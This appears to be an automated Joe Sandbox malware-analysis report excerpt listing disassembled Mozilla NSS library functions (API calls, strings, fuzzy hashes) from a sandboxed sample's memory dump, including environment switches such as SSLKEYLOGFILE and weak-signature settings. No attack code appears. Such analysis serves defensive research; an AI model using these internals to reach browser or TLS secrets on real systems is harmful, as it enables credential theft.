TlsGetValue.KERNEL32 ref: 6C822F86
EnterCriticalSection.KERNEL32(0000001C), ref: 6C822F9E
PR_Unlock.NSS3(?), ref: 6C822FCA
TlsGetValue.KERNEL32 ref: 6C82301A
EnterCriticalSection.KERNEL32(?), ref: 6C82302E
PR_Unlock.NSS3(?), ref: 6C823066
PR_SetError.NSS3(00000000,00000000), ref: 6C823085
PR_Unlock.NSS3(?), ref: 6C8230EC
TlsGetValue.KERNEL32 ref: 6C82310C
EnterCriticalSection.KERNEL32(0000001C), ref: 6C823124
PR_Unlock.NSS3(?), ref: 6C82314C

Part of subcall function 6C809180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6C83379E,?,6C809568,00000000,?,6C83379E,?,00000001,?), ref: 6C80918D
Part of subcall function 6C809180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6C83379E,?,6C809568,00000000,?,6C83379E,?,00000001,?), ref: 6C8091A0

Part of subcall function 6C7D07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C76204A), ref: 6C7D07AD
Part of subcall function 6C7D07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C76204A), ref: 6C7D07CD
Part of subcall function 6C7D07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C76204A), ref: 6C7D07D6
Part of subcall function 6C7D07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C76204A), ref: 6C7D07E4
Part of subcall function 6C7D07A0: TlsSetValue.KERNEL32(00000000,?,6C76204A), ref: 6C7D0864
Part of subcall function 6C7D07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C7D0880
Part of subcall function 6C7D07A0: TlsSetValue.KERNEL32(00000000,?,?,6C76204A), ref: 6C7D08CB
Part of subcall function 6C7D07A0: TlsGetValue.KERNEL32(?,?,6C76204A), ref: 6C7D08D7
Part of subcall function 6C7D07A0: TlsGetValue.KERNEL32(?,?,6C76204A), ref: 6C7D08FB

PR_SetError.NSS3(00000000,00000000), ref: 6C82316D

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
String ID:
API String ID: 3383223490-0
Opcode ID: 4034db6cea45be8ac4b2b59870a2f4801d88a1180808a68792099c84bf80b4c8
Instruction ID: d6f6f807fa4e378c1c73a54f54a138abd72ea24d6e75ee5e17739ce1da75249c
Opcode Fuzzy Hash: 4034db6cea45be8ac4b2b59870a2f4801d88a1180808a68792099c84bf80b4c8
Instruction Fuzzy Hash: 22F1ADB5D002089FDF20EF68D948A9DBBB8BF09318F144969EC04A7711E738E995CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6C840550 Relevance: 31.7, APIs: 13, Strings: 5, Instructions: 182stringCOMMON

Download Yara Rule

APIs

PR_GetEnvSecure.NSS3(NSS_ALLOW_WEAK_SIGNATURE_ALG,00000002,00000000,?,6C825989), ref: 6C840571

Part of subcall function 6C7D1240: TlsGetValue.KERNEL32(00000040,?,6C7D116C,NSPR_LOG_MODULES), ref: 6C7D1267
Part of subcall function 6C7D1240: EnterCriticalSection.KERNEL32(?,?,?,6C7D116C,NSPR_LOG_MODULES), ref: 6C7D127C
Part of subcall function 6C7D1240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C7D116C,NSPR_LOG_MODULES), ref: 6C7D1291
Part of subcall function 6C7D1240: PR_Unlock.NSS3(?,?,?,?,6C7D116C,NSPR_LOG_MODULES), ref: 6C7D12A0

PR_GetEnvSecure.NSS3(NSS_HASH_ALG_SUPPORT,?,00000002,00000000,?,6C825989), ref: 6C8405B7
PORT_Strdup_Util.NSS3(00000000,?,?,00000002,00000000,?,6C825989), ref: 6C8405C8
strchr.VCRUNTIME140(00000000,0000003B,?,?,?,00000002,00000000,?,6C825989), ref: 6C8405EC
strstr.VCRUNTIME140(00000001,?), ref: 6C840653
free.MOZGLUE(?,?,?,?,00000002,00000000,?,6C825989), ref: 6C840681
PORT_NewArena_Util.NSS3(00000800,?,?,?,?,00000002,00000000,?,6C825989), ref: 6C8406AB
PL_NewHashTable.NSS3(00000000,6C83FE80,?,6C88C350,00000000,00000000,?,?,?,?,?,00000002,00000000,?,6C825989), ref: 6C8406D5
PL_NewHashTable.NSS3(00000000,?,6C88C350,6C88C350,00000000,00000000), ref: 6C8406EC
PL_HashTableAdd.NSS3(?,6C90E618,6C90E618), ref: 6C84070F

Part of subcall function 6C762DF0: PL_HashTableRawAdd.NSS3(?,?,?,?,?), ref: 6C762E35

PL_HashTableAdd.NSS3(FFFFFFFF,6C90E618), ref: 6C840738
PL_HashTableAdd.NSS3(6C90E634,6C90E634), ref: 6C840752
PR_SetError.NSS3(FFFFE001,00000000,?,?,?,?,00000002,00000000,?,6C825989), ref: 6C840767

Strings

NSS_HASH_ALG_SUPPORT, xrefs: 6C8405B2
V, xrefs: 6C840559
NSS_ALLOW_WEAK_SIGNATURE_ALG, xrefs: 6C84056C
dynamic OID data, xrefs: 6C84068A
flags, xrefs: 6C840555

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: HashTable$SecureUtil$Arena_CriticalEnterErrorSectionStrdup_UnlockValuefreegetenvstrchrstrstr
String ID: NSS_ALLOW_WEAK_SIGNATURE_ALG$NSS_HASH_ALG_SUPPORT$V$dynamic OID data$flags
API String ID: 514890423-4248967104
Opcode ID: 64bcc59adfed1cd99401be5f4781eef754d93a92e09731ad00f9bff031a9c1e7
Instruction ID: 43be32c619f591551c630f851327a3750d7880824c5d8b79a0b9b20a1a28a5cc
Opcode Fuzzy Hash: 64bcc59adfed1cd99401be5f4781eef754d93a92e09731ad00f9bff031a9c1e7
Instruction Fuzzy Hash: 8B5138B1E052895FEB209B358E087573AB4EBA235CF288D35D819D7B81F731D804CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6C826CD0 Relevance: 30.3, APIs: 20, Instructions: 298stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C826910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C826943
Part of subcall function 6C826910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C826957
Part of subcall function 6C826910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C826972
Part of subcall function 6C826910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C826983
Part of subcall function 6C826910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C8269AA
Part of subcall function 6C826910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C8269BE
Part of subcall function 6C826910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C8269D2
Part of subcall function 6C826910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C8269DF
Part of subcall function 6C826910: NSSUTIL_ArgStrip.NSS3(?), ref: 6C826A5B

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C826D8C
free.MOZGLUE(00000000), ref: 6C826DC5
free.MOZGLUE(?), ref: 6C826DD6
free.MOZGLUE(?), ref: 6C826DE7
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C826E1F
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C826E4B
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C826E72
free.MOZGLUE(?), ref: 6C826EA7
free.MOZGLUE(?), ref: 6C826EC4
free.MOZGLUE(?), ref: 6C826ED5
free.MOZGLUE(00000000), ref: 6C826EE3
free.MOZGLUE(?), ref: 6C826EF4
free.MOZGLUE(?), ref: 6C826F08
free.MOZGLUE(00000000), ref: 6C826F35
free.MOZGLUE(?), ref: 6C826F44
free.MOZGLUE(?), ref: 6C826F5B
free.MOZGLUE(00000000), ref: 6C826F65

Part of subcall function 6C826C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C82781D,00000000,6C81BE2C,?,6C826B1D,?,?,?,?,00000000,00000000,6C82781D), ref: 6C826C40
Part of subcall function 6C826C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C82781D,?,6C81BE2C,?), ref: 6C826C58
Part of subcall function 6C826C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C82781D), ref: 6C826C6F
Part of subcall function 6C826C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C826C84
Part of subcall function 6C826C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C826C96
Part of subcall function 6C826C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C826CAA

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C826F90
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C826FC5
PK11_GetInternalKeySlot.NSS3 ref: 6C826FF4

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
String ID:
API String ID: 1304971872-0
Opcode ID: 0b59ee3a0ea1ee0e44078fcc754920ae313789be510558c65241919f2ebe5d29
Instruction ID: c51f7e4833add158d950790185603e11fcfcab0427b9942b7695aeb097b6d39f
Opcode Fuzzy Hash: 0b59ee3a0ea1ee0e44078fcc754920ae313789be510558c65241919f2ebe5d29
Instruction Fuzzy Hash: A7B1A6B4E012199FDF30CBA9DA48B9E77B5AF05348F240925E814E7640E739E994CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6C824C20 Relevance: 30.3, APIs: 20, Instructions: 290memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C824C4C
EnterCriticalSection.KERNEL32(?), ref: 6C824C60
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C824CA1
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C824CBE
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C824CD2
realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C824D3A
PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C824D4F
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C824DB7

Part of subcall function 6C88DD70: TlsGetValue.KERNEL32 ref: 6C88DD8C
Part of subcall function 6C88DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C88DDB4

Part of subcall function 6C7D07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C76204A), ref: 6C7D07AD
Part of subcall function 6C7D07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C76204A), ref: 6C7D07CD
Part of subcall function 6C7D07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C76204A), ref: 6C7D07D6
Part of subcall function 6C7D07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C76204A), ref: 6C7D07E4
Part of subcall function 6C7D07A0: TlsSetValue.KERNEL32(00000000,?,6C76204A), ref: 6C7D0864
Part of subcall function 6C7D07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C7D0880
Part of subcall function 6C7D07A0: TlsSetValue.KERNEL32(00000000,?,?,6C76204A), ref: 6C7D08CB
Part of subcall function 6C7D07A0: TlsGetValue.KERNEL32(?,?,6C76204A), ref: 6C7D08D7
Part of subcall function 6C7D07A0: TlsGetValue.KERNEL32(?,?,6C76204A), ref: 6C7D08FB

TlsGetValue.KERNEL32 ref: 6C824DD7
EnterCriticalSection.KERNEL32(?), ref: 6C824DEC
PR_Unlock.NSS3(?), ref: 6C824E1B
PR_SetError.NSS3(00000000,00000000), ref: 6C824E2F
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C824E5A
PR_SetError.NSS3(00000000,00000000), ref: 6C824E71
free.MOZGLUE(00000000), ref: 6C824E7A
PR_Unlock.NSS3(?), ref: 6C824EA2
TlsGetValue.KERNEL32 ref: 6C824EC1
EnterCriticalSection.KERNEL32(?), ref: 6C824ED6
PR_Unlock.NSS3(?), ref: 6C824F01
free.MOZGLUE(00000000), ref: 6C824F2A

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
String ID:
API String ID: 759471828-0
Opcode ID: e1e398ae7d0e51a91edaf85e0b6d7e23362bd7676ee1b9bd39459de1cbd8431a
Instruction ID: dc3e992a85b364bd14462b9ccd28fa0b79423f8278b3e14442e531de13ebda7e
Opcode Fuzzy Hash: e1e398ae7d0e51a91edaf85e0b6d7e23362bd7676ee1b9bd39459de1cbd8431a
Instruction Fuzzy Hash: 2DB13575A00205DFEB20EF28D948AAA77B4BFC531DF144925ED0597B01E738E9A4CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6C876E90 Relevance: 30.1, APIs: 11, Strings: 6, Instructions: 305fileCOMMON

Download Yara Rule

APIs

PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6C876BF7), ref: 6C876EB6

Part of subcall function 6C7D1240: TlsGetValue.KERNEL32(00000040,?,6C7D116C,NSPR_LOG_MODULES), ref: 6C7D1267
Part of subcall function 6C7D1240: EnterCriticalSection.KERNEL32(?,?,?,6C7D116C,NSPR_LOG_MODULES), ref: 6C7D127C
Part of subcall function 6C7D1240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C7D116C,NSPR_LOG_MODULES), ref: 6C7D1291
Part of subcall function 6C7D1240: PR_Unlock.NSS3(?,?,?,?,6C7D116C,NSPR_LOG_MODULES), ref: 6C7D12A0

fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6C91FC0A,6C876BF7), ref: 6C876ECD
ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C876EE0
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6C876EFC
PR_NewLock.NSS3 ref: 6C876F04
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C876F18
PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6C876BF7), ref: 6C876F30
PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6C876BF7), ref: 6C876F54
PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6C876BF7), ref: 6C876FE0
PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6C876BF7), ref: 6C876FFD

Strings

SSLFORCELOCKS, xrefs: 6C876F2B
# SSL/TLS secrets log file, generated by NSS, xrefs: 6C876EF7
SSLKEYLOGFILE, xrefs: 6C876EB1
NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6C876FDB
NSS_SSL_CBC_RANDOM_IV, xrefs: 6C876FF8
NSS_SSL_ENABLE_RENEGOTIATION, xrefs: 6C876F4F

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Secure$CriticalEnterLockSectionUnlockValuefclosefopenftellfwritegetenv
String ID: # SSL/TLS secrets log file, generated by NSS$NSS_SSL_CBC_RANDOM_IV$NSS_SSL_ENABLE_RENEGOTIATION$NSS_SSL_REQUIRE_SAFE_NEGOTIATION$SSLFORCELOCKS$SSLKEYLOGFILE
API String ID: 412497378-2352201381
Opcode ID: d04567d1f01915b16dbba7a91fb17d2c72564d8d522d93092ecbe5ff15ff460c
Instruction ID: d7451c019e3b39e5ff8576fbd9d43997acea06d526388c185916894c8a9a3ed1
Opcode Fuzzy Hash: d04567d1f01915b16dbba7a91fb17d2c72564d8d522d93092ecbe5ff15ff460c
Instruction Fuzzy Hash: 65A10672A59D8487E731563CCE0135C32A1EB9732DFA88B69E835C7ED4FB35A484C261

Uniqueness

Uniqueness Score: -1.00%

Function 6C7EC4B0 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 247COMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C7EC4D5

Part of subcall function 6C83BE30: SECOID_FindOID_Util.NSS3(6C7F311B,00000000,?,6C7F311B,?), ref: 6C83BE44

NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6C7EC516
NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6C7EC530
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C7EC54E
NSS_GetAlgorithmPolicy.NSS3(00000000,00000000), ref: 6C7EC5CB
VFY_VerifyDataWithAlgorithmID.NSS3(00000002,?,?,?,?,?,?), ref: 6C7EC712
NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6C7EC725
PR_SetError.NSS3(FFFFE006,00000000), ref: 6C7EC742
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C7EC751
PL_FinishArenaPool.NSS3(?), ref: 6C7EC77A
NSS_GetAlgorithmPolicy.NSS3(?,00000000), ref: 6C7EC78F
NSS_GetAlgorithmPolicy.NSS3(?,00000000), ref: 6C7EC7A9

Strings

security, xrefs: 6C7EC63F

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Algorithm$Policy$Util$ErrorTag_$ArenaDataFindFinishPoolVerifyWith
String ID: security
API String ID: 1085474831-3315324353
Opcode ID: bf6111ca5d30bd42381360bdfb898f74676e1ef70493991541ad09a4aacf5968
Instruction ID: e4f243238bb50b38741c54624e989e8fe125af38415f84474e23c78a42e09c3e
Opcode Fuzzy Hash: bf6111ca5d30bd42381360bdfb898f74676e1ef70493991541ad09a4aacf5968
Instruction Fuzzy Hash: 6C811B7BC00108AAEF10EA65DE85BEF7F74AF0930EF244535ED05E6A91E321D949C691

Uniqueness

Uniqueness Score: -1.00%

Function 6C818500 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 119COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DecryptDigestUpdate), ref: 6C818526
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C818554
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C818563

Part of subcall function 6C8FD930: PL_strncpyz.NSS3(?,?,?), ref: 6C8FD963

PR_LogPrint.NSS3(?,00000000), ref: 6C818579
PR_LogPrint.NSS3( pEncryptedPart = 0x%p,?), ref: 6C81859A
PR_LogPrint.NSS3( ulEncryptedPartLen = %d,?), ref: 6C8185B3
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6C8185CC
PR_LogPrint.NSS3( pulPartLen = 0x%p,?), ref: 6C8185E7
PR_LogPrint.NSS3( *pulPartLen = 0x%x,?), ref: 6C818659

Strings

*pulPartLen = 0x%x, xrefs: 6C818654
(CK_INVALID_HANDLE), xrefs: 6C81855C
pPart = 0x%p, xrefs: 6C8185C7
ulEncryptedPartLen = %d, xrefs: 6C8185AE
hSession = 0x%x, xrefs: 6C81853E, 6C81854E
pulPartLen = 0x%p, xrefs: 6C8185E2
pEncryptedPart = 0x%p, xrefs: 6C818595
C_DecryptDigestUpdate, xrefs: 6C818521

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulPartLen = 0x%x$ hSession = 0x%x$ pEncryptedPart = 0x%p$ pPart = 0x%p$ pulPartLen = 0x%p$ ulEncryptedPartLen = %d$ (CK_INVALID_HANDLE)$C_DecryptDigestUpdate
API String ID: 1003633598-1019776760
Opcode ID: a27f39909a250cd170c0e0bbf5d719e54adee4cab3d7f45868c7c1f1e2a36177
Instruction ID: 50f8237cf0f0b2b00c048bc6e733d741dfdc7fbc3bdd83ffb3be56bc5dbedad1
Opcode Fuzzy Hash: a27f39909a250cd170c0e0bbf5d719e54adee4cab3d7f45868c7c1f1e2a36177
Instruction Fuzzy Hash: 2341F331605105EFDB20AF58DE49E8A3BF1FB4631DF1A8835E808A7A12DB30D958CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6C816D60 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 119COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_Digest), ref: 6C816D86
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C816DB4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C816DC3

Part of subcall function 6C8FD930: PL_strncpyz.NSS3(?,?,?), ref: 6C8FD963

PR_LogPrint.NSS3(?,00000000), ref: 6C816DD9
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C816DFA
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C816E13
PR_LogPrint.NSS3( pDigest = 0x%p,?), ref: 6C816E2C
PR_LogPrint.NSS3( pulDigestLen = 0x%p,?), ref: 6C816E47
PR_LogPrint.NSS3( *pulDigestLen = 0x%x,?), ref: 6C816EB9

Strings

(CK_INVALID_HANDLE), xrefs: 6C816DBC
C_Digest, xrefs: 6C816D81
pulDigestLen = 0x%p, xrefs: 6C816E42
pData = 0x%p, xrefs: 6C816DF5
hSession = 0x%x, xrefs: 6C816D9E, 6C816DAE
ulDataLen = %d, xrefs: 6C816E0E
pDigest = 0x%p, xrefs: 6C816E27
*pulDigestLen = 0x%x, xrefs: 6C816EB4

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulDigestLen = 0x%x$ hSession = 0x%x$ pData = 0x%p$ pDigest = 0x%p$ pulDigestLen = 0x%p$ ulDataLen = %d$ (CK_INVALID_HANDLE)$C_Digest
API String ID: 1003633598-2270781106
Opcode ID: 78bcd585697a710c65502784137e6d19398ade3673c8fdf0eb637a589ce0d60b
Instruction ID: 983605c0848ccc6f19e39fb3dc10490c7e7ade4e8d1897967e1f4c40c242224d
Opcode Fuzzy Hash: 78bcd585697a710c65502784137e6d19398ade3673c8fdf0eb637a589ce0d60b
Instruction Fuzzy Hash: BE41C435605005EFDB20AB58DE48F8A3BF1EB8661DF148834E408D7A12DB31E909CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6C818690 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 119COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_SignEncryptUpdate), ref: 6C8186B6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C8186E4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C8186F3

Part of subcall function 6C8FD930: PL_strncpyz.NSS3(?,?,?), ref: 6C8FD963

PR_LogPrint.NSS3(?,00000000), ref: 6C818709
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6C81872A
PR_LogPrint.NSS3( ulPartLen = %d,?), ref: 6C818743
PR_LogPrint.NSS3( pEncryptedPart = 0x%p,?), ref: 6C81875C
PR_LogPrint.NSS3( pulEncryptedPartLen = 0x%p,?), ref: 6C818777
PR_LogPrint.NSS3( *pulEncryptedPartLen = 0x%x,?), ref: 6C8187E9

Strings

